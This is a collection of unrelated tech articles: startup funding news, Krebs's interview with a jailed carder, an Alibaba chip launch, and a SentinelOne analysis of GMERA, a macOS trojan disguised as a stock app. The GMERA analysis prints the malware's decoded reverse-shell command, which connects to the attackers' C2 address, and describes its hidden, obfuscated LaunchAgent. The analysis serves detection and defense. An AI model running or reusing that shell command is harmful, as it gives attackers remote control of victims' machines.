India’s Darwinbox raises $15M to bring its HR tech platform to more Asian markets

An Indian SaaS startup, which is increasingly courting clients from outside the country, just raised a significant amount of capital to expand its business.

Hyderabad-based Darwinbox, which operates a cloud-based human resource management platform, said on Thursday it has raised $15 million in a new financing round. The Series B round — which moves the firm’s total raise to $19.7 million — was led by Sequoia India and saw participation from existing investors Lightspeed India Partners, Endiya Partners and 3one4 Capital.

More than 200 firms — including giants such as adtech firm InMobi, fintech startup Paytm, drink conglomerate Bisleri, automobile maker Mahindra, Kotak group and delivery firms Swiggy and Milkbasket — use Darwinbox’s HR platform to serve half a million of their employees in 50 nations, Rohit Chennamaneni, co-founder of Darwinbox, told TechCrunch in an interview.

The startup, which competes with giants such as SAP and Oracle, said its platform enables a high level of configurability and ease of use, and understands the needs of modern employees. “The employees today who have grown accustomed to using consumer-focused services such as Uber and Amazon are left disappointed in their experience with their own firm’s HR offerings,” said Gowthami Kanumuru, VP Marketing at Darwinbox, in an interview.

Darwinbox’s HR platform offers a range of features, including the ability for firms to offer their employees insurance and early salary as loans. Its platform also features social networks for employees within a company to connect and talk, as well as an AI assistant that allows them to apply for a leave or set up meetings with quick voice commands from their phone.

“The AI system is not just looking for certain keywords. If an employee tells the system he or she is not feeling well today, it automatically applies a leave for them,” she said.

Darwinbox’s platform is built to handle onboarding new employees, keep a tab on their performance, monitor attrition rate and maintain an ongoing feedback loop. Or as Kanumuru puts it, the entire “hiring to retiring” cycle.

One of Darwinbox’s clients is L&T, which is tasked with setting up subways in many Indian cities. L&T is using Darwin’s geo-fencing feature to log the attendance of employees. “They are not using biometric punch machine that is typically used by other firms. Instead, they just require their 1,200 employees to check-in from the workplace using their phones,” said Kanumuru.

darwinbox event

Additionally, Darwinbox is largely focusing on serving companies based in Asia as it believes Western companies’ solutions are not a great fit for people here, said Kanumuru. The startup began courting clients in Southeast Asian markets last year.

“Our growth is a huge validation for our vision,” she said. “Within six months of operations, we had the delivery giant Delhivery with over 23,000 employees use our platform.”

In a statement to TechCrunch, Dev Khare, a partner at Lightspeed Venture, said, “there is a new trend of SaaS companies targeting the India/SE Asia markets. This trend is gathering steam and is disproving the conventional wisdom that Asia-focused SaaS companies cannot get to be big companies. We firmly believe that Asia-focused SaaS companies can get to large impact value and become large and profitable. Darwinbox is one of these companies.”

Darwinbox’s Chennamaneni said the startup will use the fresh capital to expand its footprints in Indonesia, Malaysia, Thailand and other Southeast Asian markets. Darwinbox also will expand its product offerings to address more of employees’ needs. The startup is also looking to make its platform enable tasks such as booking of flights and hotels.

Chennamaneni, an alum of Google and McKinsey, said Darwinbox aims to double the number of clients it has in the next six to nine months.

Battlefield vets StrongSalt (formerly OverNest) announces $3M seed round

StrongSalt, then known as OverNest, appeared at the TechCrunch Disrupt NYC Battlefield in 2016, and announced a product for searching encrypted code, which remains unusual to this day. Today, the company announced a $3 million seed round led by Valley Capital Partners.

StrongSalt founder and CEO Ed Yu says encryption remains a difficult proposition, and that when you look at the majority of breaches, encryption wasn’t used. He said that his company wants to simplify adding encryption to applications, and came up with a new service to let developers add encryption in the form of an API. “We decided to come up with what we call an API platform. It’s like infrastructure that allows you to integrate our solution into any existing or any new applications,” he said.

The company’s original idea was to create a product to search encrypted code, but Yu says the tech has much more utility as an API that’s applicable across applications, and that’s why they decided to package it as a service. It’s not unlike Twilio for communications or Stripe for payments, except in this case you can build in searchable encryption.

The searchable part is actually a pretty big deal because, as Yu points out, when you encrypt data it is no longer searchable. “If you encrypt all your data, you cannot search within it, and if you cannot search within it, you cannot find the data you’re looking for, and obviously you can’t really use the data. So we actually solved that problem,” he said.

Developers can add searchable encryption as part of their applications. For customers already using a commercial product, the company’s API actually integrates with popular services, enabling customers to encrypt the data stored there, while keeping it searchable.

“We will offer a storage API on top of Box, AWS S3, Google Cloud, Azure — depending on what the customer has or wants. If the customer already has AWS S3 storage, for example, then when they use our API, and after encrypting the data, it will be stored in their AWS repository,” Yu explained.

For those companies that don’t have a storage service, the company is offering one. What’s more, they are using the blockchain to provide a mechanism for sharing, auditing and managing encrypted data. “We also use the blockchain for sharing data by recording the authorization by the sender, so the receiver can retrieve the information needed to reconstruct the keys in order to retrieve the data. This simplifies key management in the case of sharing and ensures auditability and revocability of the sharing by the sender,” Yu said.

If you’re wondering how the company has been surviving since 2016, while only getting its seed round today, it had a couple of small seed rounds prior to this, and a contract with the U.S. Department of Defense, which replaced the need for substantial earlier funding.

“The DOD was looking for a solution to have secure communication between computers, and they needed to have a way to securely store data, and so we were providing a solution for them,” he said. In fact, this work was what led them to build the commercial API platform they are offering today.

The company, which was founded in 2015, currently has 12 employees spread across the globe.

MediaRadar’s new product helps event organizers maximize sales

MediaRadar CEO Todd Krizelman describes his company as having “a very specific objective, which is to help media salespeople sell more advertising” by providing them with crucial data. And with today’s launch of MediaRadar Events, Krizelman hopes to do something similar for event organizers.

These customer groups might actually be one and the same, as plenty of companies (including TechCrunch) see both advertising and events as part of their business. In fact, Krizelman said customer demand “basically pushed us into this business.

He also suggested that after years of seeing traditional ad dollars shifting into digital, “the money is now moving out of digital into events.”

If you’re organizing a trade show, you can use MediaRadar Events to learn about the overall size of the market, and then see who’s been purchasing sponsorships and exhibitor booths at similar events.

The product doesn’t just tell you who to reach out to, but how much these companies have paid for booths and sponsorships in the past, whether there are seasonal patterns in their conference spending and how that spending fits into their overall marketing budget — after all, Krizelman said, “In 2019, very few companies are siloed by media format as a buyer or a seller. Anyone doing that is putting their business at risk.”

He also described collecting the data needed to power MediaRadar Events as “much more complicated than we expected,” which is why it took the team two years to build the product. He said that data comes from three sources — some of it is posted publicly by event organizers, some is shared directly by the event organizers with MediaRadar and, in some cases, members of the MediaRadar team will attend the events themselves.

MediaRadar Events support a wide range of events, although Krizelman acknowledged that it doesn’t have data for every industry. For example, he suggested that a convention for coin-operated laundromat owners might be “too niche” (though he hastened to add that he meant no offense to the laundromat business).

In a statement, James Ogle — chief financial officer at Access Intelligence (which owns the LeadsCon conference and publications like AdExchanger) — said:

Hosting events and the resulting revenue that comes from them is a big part of our business. However, the event space is getting more and more crowded and also more niche. Relevancy equals value, so we want to make sure our attendees are within the right target market for our exhibitors. MediaRadar provides critical transparency into the marketplace.

Interview With the Guy Who Tried to Frame Me for Heroin Possession

In April 2013, I received via U.S. mail more than a gram of pure heroin as part of a scheme to get me arrested for drug possession. But the plan failed and the Ukrainian mastermind behind it soon after was imprisoned for unrelated cybercrime offenses. That individual recently gave his first interview since finishing his jail time here in the states, and he’s shared some select (if often abrasive and coarse) details on how he got into cybercrime and why. Below are a few translated excerpts.

When I first encountered now-31-year-old Sergei “Fly,” “Flycracker,” “MUXACC” Vovnenko in 2013, he was the administrator of the fraud forum “thecc[dot]bz,” an exclusive and closely guarded Russian language board dedicated to financial fraud and identity theft.

Many of the heavy-hitters from other fraud forums had a presence on Fly’s forum, and collectively the group financed and ran a soup-to-nuts network for turning hacked credit card data into mounds of cash.

Vovnenko first came onto my radar after his alter ego Fly published a blog entry that led with an image of my bloodied, severed head and included my credit report, copies of identification documents, pictures of our front door, information about family members, and so on. Fly had invited all of his cybercriminal friends to ruin my financial identity and that of my family.

Somewhat curious about what might have precipitated this outburst, I was secretly given access to Fly’s cybercrime forum and learned he’d freshly hatched a plot to have heroin sent to my home. The plan was to have one of his forum lackeys spoof a call from one of my neighbors to the police when the drugs arrived, complaining that drugs were being delivered to our house and being sold out of our home by Yours Truly.

Thankfully, someone on Fly’s forum also posted a link to the tracking number for the drug shipment. Before the smack arrived, I had a police officer come out and take a report. After the heroin showed up, I gave the drugs to the local police and wrote about the experience in Mail From the Velvet Cybercrime Underground.

Angry that I’d foiled the plan to have me arrested for being a smack dealer, Fly or someone on his forum had a local florist send a gaudy floral arrangement in the shape of a giant cross to my home, complete with a menacing message that addressed my wife and was signed, “Velvet Crabs.”

The floral arrangement that Fly or one of his forum lackeys had delivered to my home in Virginia.

Vovnenko was arrested in Italy in the summer of 2014 on identity theft and botnet charges, and spent some 15 months in arguably Italy’s worst prison contesting his extradition to the United States. Those efforts failed, and he soon pleaded guilty to aggravated identity theft and wire fraud, and spent several years bouncing around America’s prison system.

Although Vovnenko sent me a total of three letters from prison in Naples (a hand-written apology letter and two friendly postcards), he never responded to my requests to meet him following his trial and conviction on cybercrime charges in the United States. I suppose that is fair: To my everlasting dismay, I never responded to his Italian dispatches (the first I asked to be professionally analyzed and translated before I would touch it).

Seasons greetings from my pen pal, Flycracker.

After serving his 41 month sentence in the U.S., Vovnenko was deported, although it’s unclear where he currently resides (the interview excerpted here suggests he’s back in Italy, but Fly doesn’t exactly confirm that). 

In an interview published on the Russian-language security blog Krober[.]biz, Vovnenko said he began stealing early in life, and by 13 was already getting picked up for petty robberies and thefts.

A translated English version of the interview was produced and shared with KrebsOnSecurity by analysts at New York City-based cyber intelligence firm Flashpoint.

Sometime in the mid-aughts, Vovnenko settled with his mother in Naples, Italy, but he had trouble keeping a job for more than a few days. Until a chance encounter led to a front job at a den of thieves.

“When I came to my Mom in Naples, I could not find a permanent job. Having settled down somewhere at a new job, I would either get kicked out or leave in the first two days. I somehow didn’t succeed with employment until I was invited to work in a wine shop in the historical center of Naples, where I kinda had to wipe the dust from the bottles. But in fact, the wine shop turned out to be a real den and a sales outlet of hashish and crack. So my job was to be on the lookout and whenever the cops showed up, take a bag of goods and leave under the guise of a tourist.”

Cocaine and hash were plentiful at his employer’s place of work, and Vovnenko said he availed himself of both abundantly. After he’d saved enough to buy a computer, Fly started teaching himself how to write programs and hack stuff. He quickly became enthralled with the romanticized side of cybercrime — the allure of instant cash — and decided this was his true vocation.

“After watching movies and reading books about hackers, I really wanted to become a sort of virtual bandit who robs banks without leaving home,” Vovnenko recalled. “Once, out of curiosity, I wrote an SMS bomber that used a registration form on a dating site, bypassing the captcha through some kind of rookie mistake in the shitty code. The bomber would launch from the terminal and was written in Perl, and upon completion of its work, it gave out my phone number and email. I shared the bomber somewhere on one of my many awkward sites.”

“And a couple of weeks later they called me. Nah, not the cops, but some guy who comes from Sri Lanka who called himself Enrico. He told me that he used my program and earned a lot of money, and now he wants to share some of it with me and hire me. By a happy coincidence, the guy also lived in Naples.”

“When we met in person, he told me that he used my bomber to fuck with a telephone company called Wind. This telephone company had such a bonus service: for each incoming SMS you received two cents on the balance. Well, of course, this guy bought a bunch of SIM cards and began to bomb them, getting credits and loading them into his paid lines, similar to how phone sex works.”

But his job soon interfered with his drug habit, and he was let go.

“At the meeting, Enrico gave me 2K euros, and this was the first money I’ve earned, as it is fashionable to say these days, on ‘cybercrime’. I left my previous job and began to work closely with Enrico. But always stoned out of my mind, I didn’t do a good job and struggled with drug addiction at that time. I was addicted to cocaine, as a result, I was pulling a lot more money out of Enrico than my work brought him. And he kicked me out.”

After striking out on his own, Vovnenko says he began getting into carding big time, and was introduced to several other big players on the scene. One of those was a cigarette smuggler who used the nickname Ponchik (“Doughnut”).

I wonder if this is the same Ponchik who was arrested in 2013 as being the mastermind behind the Blackhole exploit kit, a crimeware package that fueled an overnight explosion in malware attacks via Web browser vulnerabilities.

In any case, Vovnenko had settled on some schemes that were generating reliably large amounts of cash.

“I’ve never stood still and was not focusing on carding only, with the money I earned, I started buying dumps and testing them at friends’ stores,” Vovnenko said. “Mules, to whom I signed the hotlines, were also signed up for cashing out the loads, giving them a mere 10 percent for their work. Things seemed to be going well.”

FAN MAIL

There is a large chronological gap in Vovnenko’s account of his cybercrime life story from that point on until the time he and his forum friends started sending heroin, large bags of feces and other nasty stuff to our Northern Virginia home in 2013.

Vovnenko claims he never sent anything and that it was all done by members of his forum.

-Tell me about the packages to Krebs.
“That ain’t me. Suitcase filled with sketchy money, dildoes, and a bouquet of coffin wildflowers. They sent all sorts of crazy shit. Forty or so guys would send. When I was already doing time, one of the dudes sent it. By the way, Krebs wanted to see me. But the lawyer suggested this was a bad idea. Maybe he wanted to look into my eyes.”

In one part of the interview, Fly is asked about but only briefly touches on how he was caught. I wanted to add some context here because this part of the story is richly ironic, and perhaps a tad cathartic.

Around the same time Fly was taking bitcoin donations for a fund to purchase heroin on my behalf, he was also engaged to be married to a nice young woman. But Fly apparently did not fully trust his bride-to-be, so he had malware installed on her system that forwarded him copies of all email that she sent and received.

Fly,/Flycracker discussing the purchase of a gram of heroin from Silk Road seller “10toes.”

But Fly would make at least two big operational security mistakes in this spying effort: First, he had his fiancée’s messages forwarded to an email account he’d used for plenty of cybercriminal stuff related to his various “Fly” identities.

Mistake number two was the password for his email account was the same as one of his cybercrime forum admin accounts. And unbeknownst to him at the time, that forum was hacked, with all email addresses and hashed passwords exposed.

Soon enough, investigators were reading Fly’s email, including the messages forwarded from his wife’s account that had details about their upcoming nuptials, such as shipping addresses for their wedding-related items and the full name of Fly’s fiancée. It didn’t take long to zero in on Fly’s location in Naples.

While it may sound unlikely that a guy so immeshed in the cybercrime space could make such rookie security mistakes, I have found that a great many cybercriminals actually have worse operational security than the average Internet user.

I suspect this may be because the nature of their activities requires them to create vast numbers of single- or brief-use accounts, and in general they tend to re-use credentials across multiple sites, or else pick very poor passwords — even for critical resources.

In addition to elaborating on his hacking career, Fly talks a great deal about his time in various prisons (including their culinary habits), and an apparent longing or at least lingering fondness for the whole carding scene in general.

Towards the end, Fly says he’s considering going back to school, and that he may even take up information security as a study. I wish him luck in that whatever that endeavor is as long as he can also avoid stealing from people.

I don’t know what I would have written many years ago to Fly had I not been already so traumatized by receiving postal mail from him. Perhaps it would go something like this:

“Dear Fly: Thank you for your letters. I am very sorry to hear about the delays in your travel plans. I wish you luck in all your endeavors — and I sincerely wish the next hopeful opportunity you alight upon does not turn out to be a pile of shit.”

The entire translated interview is here (PDF). Fair warning: Many readers may find some of the language and topics discussed in the interview disturbing or offensive.

Detecting macOS.GMERA Malware Through Behavioral Inspection

Last week, researchers at Trend Micro spotted a new piece of in-the-wild macOS malware that spoofs a genuine stock market trading app to open a backdoor and run malicious code. In this post, we first give an overview of how the malware works, and then use this as an example to discuss different detection and response strategies, with a particular emphasis on explaining the principles and advantages of using behavioral detection on macOS.

feature image with text

An Overview of GMERA Malware

Let’s begin by taking a look at the technical details of this new piece of macOS malware. 

Two variants were initially discovered by researchers who identified them as GMERA.A and GMERA.B. In this post, we will focus on the interesting points in a particular sample of GMERA.B that pertain to detection and response. 

Our sample, which was not analayzed in the previous research, is:

d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Despite having been on VirusTotal for 9 days already, and that the initial Trend Micro research hit the news 5 days ago, this particular sample remains undetected by reputation engines on the VT site as of today.

image of undetected virus total

As with the GMERA.A variant, the malware comes in a macOS application bundle named “Stockfoli.app”. The name is a letter shy of a genuine app called “Stockfolio.app”, which the malware purports to be a copy of, and which is placed inside the malicious Stockfoli.app’s Resources folder.

image of terminal resources dir

The Stockfolio.app inside the Resources folder appears to be an undoctored version of the genuine app, save for the fact that the malware authors have replaced the original developer’s code signature with their own. We will come back to code signing in the next section.

Of particular note in the Resources folder is the malicious run.sh script. 

image of run shell script

We can see that in this sample the script contains a bunch of lightly encoded base64 and that upon decoding, it will write the contents as a hidden property list file in the ~/Library/LaunchAgents folder with, in this case, the file name .com.apple.upd.plist.

Upon decoding the base64, we see the dropped property list file itself contains more encoded base64 in its Program Arguments.

image of launch agent decoded

Further decoding reveals a bash script that opens a reverse shell to the attackers’ C2.

while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

The code sleeps for 10000 seconds, then quits and kills any previous connection. The screen utility is then used to start a new session in ‘detached’ mode. This essentially allows the attacker to resume the same session if the connection should drop at any point. The script then invokes Bash’s interactive mode to redirect the session to the attackers device at the URL shown above across port 25733. In their write-up, the Trend Micro researchers reported seeing the reverse shell used over ports 2573325736. Disassembly of the main binary in our sample shows that two further ports, 25737 and 25738, may also be utilized, with the latter used with zsh rather than bash as the shell of choice.

image of hopper and ports

Before we move on to discuss detection and response, let’s note one further characteristic of the malware not pointed out in the previous research. The malicious Stockfoli.app’s Info plist is being distributed with at least two different bundle identifiers (we’re sure there will be more). These are:

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

Looked at casually, those look like they begin with ‘com.apple’. But closer inspection (or changing the font) reveals that the ‘l’ in “apple” is in fact a capital “I”.

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

We will come back to the reason for this ruse below. 

CERT REVOKED WHACK-A-MOLE

Let’s turn to detection and response. If you’re a Mac user running an unprotected Mac (i.e., you’re not using a Next-Gen solution like SentinelOne), you might be glad to hear that these malicious samples should now fail to execute if you try to download and run them. That’s due to the fact that Apple have since revoked the code signature used to sign these samples. 

image of cert revoked

While it’s great to see Apple on the ball and revoking the signatures of known malware, this kind of after-the-fact protection shouldn’t provide as much comfort as some seem to take from it. A fellow macOS enthusiast remarked to me after this latest discovery that Apple’s action proved to him that Macs are secure against malware, to which my somewhat more circumspect response was: how long was this malware in the wild before it was discovered and the signature revoked? How many users were infected by this malware before it became publicly known? How many unknown, validly signed malware samples are still out there?

It won’t be long before the threat actors package their wares in a newly signed bundle and the game of whack-a-mole begins again: attackers create and distribute a malicious app with a valid code signature; after some variable amount of time in the wild, the malware is discovered and Apple revoke the signature; the attackers then repackage the malware with a fresh signature and the process begins all over again!

If you’re the victim, a day, an hour, or even a minute is too late if you’re relying on this kind of mechanism to protect you. In fact, it inherently relies on some people becoming victims in order for samples to be discovered and signatures revoked in the first place. Cold comfort if you’re one of the unfortunate early victims!

Perhaps not widely appreciated is just how easy it is for bad actors to acquire valid code signing identities. Given the rewards, bad actors are quite happy to burn $99 subscriptions and play whack-a-mole with Apple. This is relatively easy to do as there are many fake and compromised (i.e., hacked) AppleIDs that can be turned into developer signatures using stolen credit cards and other payment methods. 

Repackaging the same malicious script inside a new app bundle with a new cert is a task that can be automated with very little effort; it is a technique we see the commodity adware and PUP players use on a daily basis.

YARA YARA, YADA YADA…

To be fair, Apple don’t just rely on revoking certs of discovered malware though. Indeed, they have been talking a lot about ‘defense in depth’ recently (WWDC 2019), and as regular readers of this blog will know, Apple have a suite of built-in tools like Gatekeeper, XProtect and MRT to help block and remediate known malware. With the upcoming Catalina release, Apple will add compulsory notarization to their armoury, too.

These tools rely on a combination of different strategies, from extended file attributes, hardcoded file paths and hashes to Yara rules that specify particular characteristics of a binary. While hashes and file paths are typically limited to a single variant of malware, Yara rules at least have the advantage that they can be used to identify families of malware that share similar characteristics. Here’s an example from XProtect:

image of xprotect yara rule

This Yara rule specifies five sets of strings that, if they all appear in a Mach-O executable with a file size of less than 200KB, then XProtect should block this as a member of the malware family MACOS.6175e25. Let’s translate those strings from hex to see what they actually are:

image of xprotect yara rule

To be clear, this rule has nothing to do with the GMERA malware under discussion here. At the time of writing, neither XProtect nor MRT.app have been updated to detect GMERA malware. The point here is to show how Yara rules in general work. The rule shown above is in fact for some malware we’ve reversed before. From the malware author’s point of view, it is easy to see just what XProtect is hitting on, and with that knowledge, to adapt his or her work. 

But wouldn’t that be difficult? Not at all. It’s far less work for malware authors than it is for Apple. A simple trick for malware authors to use to avoid Yara rules like the above is simply to rename methods (it would only take a letter different to break that rule above), or to use an encoding like base64, which can be encoded multiple times. There really are numerous ways to make minor changes that will break Yara rules. Meanwhile, Apple (and 3rd party security vendors that rely on the same techniques) have to wait until the changes come to light, then test and update their revised signatures. All the while, the threat actors are achieving compromises while Apple and other vendors continually have to play catch-up, knowing full-well that their updated signatures will be obsolete within hours.

A crucial part of this unwinnable game is that, as with revoking certs, file paths, hashes and Yara rules all have one fatal weakness: they rely on prior discovery of a sample. Once again, after-the-fact detection is no solace for the before-everyone-else-heard-about-it victims.

Beating macOS Malware By Detecting Suspicious Behavior

Fortunately, there is another way to detect and block malware which doesn’t rely on prior knowledge. Malware and threat actors have limited and specific goals. While the implementation details can be vast and varied, the actual behavior required to meet those objectives is both finite and definable.  With a behavioral detection engine, the implementation details become entirely irrelevant. 

Just as we do not detect criminals by looking at the way their brains are wired or measuring the shape and size of their skulls (anymore!) but rather by assessing the way they act against expected social and legal norms, so we can do the same with malicious software, scripts and processes. 

Regardless of the inner wiring, malicious processes – like criminals – engage in certain kinds of undesirable behavior. By tracking and contextualizing individual events in the process lifecycle, we can put together a picture or ‘story’ that says:

“Taken together, these events constitute undesirable behavior and we should alert on and/or block them.”

By focusing on dynamic behavior rather than relying on static characteristics like strings, hashes and paths, we can identify malware even if we have not seen its particular implementation previously.

This is the principle behind SentinelOne’s behavioral and AI engines. Although I can’t go into the actual details of how SentinelOne does its magic under the hood, we can get a sense of how behavioral detection works in principle by looking at the GMERA malware as an example. 

As we have seen, the macOS.GMERA malware writes a persistence agent to ~/Library/LaunchAgents. If you were manually threat hunting on macOS, a newly written LaunchAgent would immediately cause you to investigate further, and the same can be true for automated responses. We also saw that in the case of the GMERA malware, the parent process dropped a persistence agent that was made invisible in the Finder by prefixing a period to the filename. 

image of hidden launch agent

That should raise our suspicion even further. Such behavior is not only unusual for legitimate software but is also behavior that has no legitimate purpose. The primary reason for allowing processes to write invisible files is to hide temporary data and metadata that have no conceivable interest to the user. While there may be a few other legitimate uses (such as DRM licensing and such like), there’s little reason why a genuine persistence agent should be invisible to the user in the Finder. 

Thirdly, this LaunchAgent’s behavior itself is anomalous. Rather than executing a file at a given path, it decodes and executes in memory a script that is obfuscated with base64. While there’s no doubt some conceivable edge case where this might be legitimate, in the typical enterprise situation such behaviour is almost certainly designed to deceive and something we should be alerting on. Even the edge cases are worthy of our attention, if only to encourage wayward users to engage in better, safer and more transparent practices.

Finally, as we noted above, the parent application uses a bundle Identifier that is clearly intended to mislead. 

This is a sleight-of-hand intended to trick unwary users, who may easily overlook such a process as benign. The tactic may also trick some unsophisticated security solutions that check whether processes with a “com.apple” bundle identifier are actually signed with Apple’s signature. Replacing the ‘l’ in Apple with a capital ‘I’ would neatly sidestep such a heuristic. 

If you were writing a detection engine, you might consider that as something to look out for – homograph attacks are a tried and trusted technique in URL and Domain Name spoofing – but you might equally well not care either way. It matters less what a file is called and more what it does. A hidden persistence mechanism opening a reverse shell in memory that has been dropped by an application with no apparent functional relation? What could be more suspicious than that?

Detecting GMERA Malware Through Behavioral Inspection

So much for the theory, but does it work in practice? Despite the fact the GMERA malware application bundle itself will fail to run once the cert has been revoked (unless we were to remove the code signing or resign it with an ad hoc cert), it is still perfectly possible to execute the malicious run.sh script bundled in the application’s Resources folder without complaint from Apple’s built-in security tools. That means we can still test a significant part of the malware’s behaviour. And of course, it means an attacker could do this manually, and so could another malicious process that found the Stockfoli.app bundle lying around, perhaps in a subsequent infection incident.

Let’s see how the SentinelOne behavioral engine reacts to execution of the run.sh script. As soon as we execute the script, we get a detection on the Agent side.

image of agent detection

We can see more details on the Management console side:

image of management console

Note the MITRE ATT&CK TTPs:

Process dropped a hidden suspicious plist to achieve persistency {T1150}
Process wrote a hidden file to achieve persistency {T1158}
Process achieved persistency through launchd job {T1160}

As we have set the policy on our test machine to detect rather than block — so that we can inspect the malware’s behavior — SentinelOne lets the script continue its execution. The Attack Story Line shows the hierarchy of processes and the entire kill chain.

image of attack story line

Of course, in a live deployment you would set the policy to simply block this at the outset. For research purposes, however, the Detect Only policy is useful to examine the malware’s behavior and learn more about our adverseries’ TTPs.

Conclusion

The recently discovered GMERA malware doesn’t offer anything new in terms of attacker tools, tactics and procedures. It leverages a fairly well-worn, easily-constructed route to compromise and persistence: a fake app, a Launch Agent for persistence and a simple bash or zsh-based reverse shell to open the victim up to post-exploitation, data exfiltration and perhaps further infection. And yet, so many solutions – including Apple’s built-in offerings – fail to detect these kind of threats pre-execution or on-execution, instead relying on discovery and software updates to belatedly offer protection to those that were lucky enough to avoid becoming victims in the first wave.

A solution that offers real defense-in-depth, with multiple static, behavioral and AI engines packaged in a single agent is the only way to stay ahead of attackers and protect your Mac users from whatever new threat comes next. Remember, malware authors can innovate to their hearts’ content, but insofar as they keep on acting suspiciously, we can keep on rooting them out. 

Would you like to see how SentinelOne can work for you? Contact us for a free demo.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Alibaba unveils Hanguang 800, an AI inference chip it says significantly increases the speed of machine learning tasks

Alibaba Group introduced its first AI inference chip today, a neural processing unit called Hanguang 800 that it says makes performing machine learning tasks dramatically faster and more energy efficient. The chip, announced today during Alibaba Cloud’s annual Apsara Computing Conference in Hangzhou, is already being used to power features on Alibaba’s e-commerce sites, including product search and personalized recommendations. It will be made available to Alibaba Cloud customers later.

As an example of what the chip can do, Alibaba said it usually takes Taobao an hour to categorize the one billion product images that are uploaded to the e-commerce platform each day by merchants and prepare them for search and personalized recommendations. Using Hanguang 800, Taobao was able to complete the task in only five minutes.

Alibaba is already using Hanguang 800 in many of its business operations that need machine processing. In addition to product search and recommendations, this includes automatic translation on its e-commerce sites, advertising and intelligence customer services.

Though Alibaba hasn’t revealed when the chip will be available to its cloud customers, the chip may help Chinese companies reduce their dependence on U.S. technology as the trade war makes business partnerships between Chinese and American tech companies more difficult. It also can help Alibaba Cloud grow in markets outside of China. Within China, it is the market leader, but in the Asia-Pacific region, Alibaba Cloud still ranks behind Amazon, Microsoft and Google, according to the Synergy Research Group.

Hanguang 800 was created by T-Head, the unit that leads the development of chips for cloud and edge computing within Alibaba DAMO Academy, the global research and development initiative in which Alibaba is investing more than $15 billion. T-Head developed the chip’s hardware and algorithms designed for business apps, including Alibaba’s retail and logistics apps.

In a statement, Alibaba Group CTO and president of Alibaba Cloud Intelligence Jeff Zhang (pictured above) said, “The launch of Hanguang 800 is an important step in our pursuit of next-generation technologies, boosting computing capabilities that will drive both our current and emerging businesses while improving energy-efficiency.”

He added, “In the near future, we plan to empower our clients by providing access through our cloud business to the advanced computing that is made possible by the chip, anytime and anywhere.”

T-Head’s other launches included the XuanTie 910 earlier this year, an IoT processor based on RISC-V, the open-source hardware instruction set that began as a project at UC Berkeley. XuanTie 910 was created for heavy-duty IoT applications, including edge servers, networking, gateway and autonomous vehicles.

Alibaba DAMO Academy collaborates with universities around the world, including UC Berkeley and Tel Aviv University. Researchers in the program focus on machine learning, network security, visual computing and natural language processing, with the goal of serving two billion customers and creating 100 million jobs by 2035.

ZenBusiness raises $15M to help founders launch and grow ‘worry-free’

There are two sides to starting a new business. On one side, entrepreneurs need creativity, imagination — a dream, essentially — to find, build, and market a new product to users and consumers. But on the other side, they have to deal with the regulatory state and all the minutia that comes with running any business in the 21st century.

That includes such delightful topics as choosing a particular model for incorporation, ensuring that a business has the right licenses to operate, and tracking all the legal changes happening in 50 state legislatures every year. It can be inordinately complicated (and expensive!) to ensure that your business is ready and legal.

That’s where ZenBusiness comes in. The Austin-based startup wants to empower entrepreneurs to build businesses large and small by dramatically simplifying the processes required to launch a business and then grow it.

When I last chatted with the company 18 months ago, they had just raised a $4.5 million seed round and had launched its platform. Today, it’s announcing that it has raised a new $15 million series A round led by return backer Greycroft, along with returning investors Lerer Hippeau and Revolution’s Rise of the Rest fund, alongside new investors Rosecliff Venture Partners, Interlock Partners and Recruit Strategic Partners.

The company launched with a product that was essentially an automated registered agent for new entrepreneurs. Under state incorporation laws, companies must designate a so-called “registered agent” to receive official notices from regulatory agencies, and so ZenBusiness chose this strategic point for entry into the market.

When I last chatted with CEO Russ Buhrdorf, he described rolling up this market as one of the key initial targets for the company:

ZenBusiness is the brainchild of Ross Buhrdorf, who joined vacation rental marketplace HomeAway five months after its inception as founding CTO, and stayed for a decade until its acquisition by Expedia in 2015 for $3.9 billion. Buhrdorf intended to take a year off, but “didn’t quite make it a year” he told me.

He explained to me that HomeAway in many ways followed a rollup playbook, “raising $400 million and acquired 26 companies.” Bringing that rollup lens while exploring new spaces, he ran into the corporate legal services market, which offers help to companies to keep them in compliance with the law. Buhrdorf liked what he saw. “It’s different in all 50 states, highly-regulated, which is great for technology, it is overpriced, and they underserve their customers.” He says the space is “completely ripe for disruption.”

Since that time, the company has expanded its product to help entrepreneurs get beyond merely incorporating to actually building out their business by recommending services like banking, lending, tax preparation, website building, and more. The hope is to provide a “worry-free” guarantee to entrepreneurs so that they can get those early critical logistics out of the way and back to actually operating and growing their business.

“Small businesses come through this funnel, they don’t necessarily know exactly what to do. So we curate that solution, and then we provide them with the basics for them to get up and running and to be successful,” Buhrdorf said.

He explained that the company has built out some tools itself such as a simple webpage creator, but in the long run, he hopes to partner with other providers who integrate into the ZenBusiness platform. For instance, ZenBusiness has partnered with Xero as the company’s main accounting provider, while also backstopping that offering with accountants working at ZenBusiness. The idea is that the automated tooling plus a little human touch can help most owners handle the day-to-day challenges of running a business.

TeamPhoto2018

The ZenBusiness team in 2018. Photo via ZenBusiness.

Buhrdorf is particularly focused on keeping the product very self-service and automated to allow it to focus on these smaller customers. “Many of the companies that you cover that are in the enterprise space, who provide solutions for medium-sized businesses, they have to charge, they have to have sales forces, it’s very competitive there,” Buhrdorf said. “What we’re after is the segment that’s underserved, it’s the long tail of the small business segment.”

ZenBusiness has expanded its services, and it is hoping to use the fresh infusion of capital to invest in building out community features that will allow small business owners to swap tips with each other and help one another grow their businesses (presumably with some guidance from ZenBusiness community managers and experts).

The company is now 40 employees predominantly in Austin with a small office in Peru. Since we last checked in, the company has transitioned to become a public benefit corporation, which Buhrdorf said was an attempt to better align the company’s charter with its mission orientation to help small business entrepreneurs.

Update: The funding total was changed from $10m to $15m. Sorry about that.

Vannevar Labs comes out of stealth to bring best-in-class AI tech to national security agencies

Few organizations have the complex data and analytics problems that challenge the defense and intelligence communities every single day. Whether it is managing petabytes of text, audio, or video data, finding extraordinarily small patterns in the noise, or processing multilingual analytics, the agencies at the heart of America’s national security system confront cutting-edge problems every day.

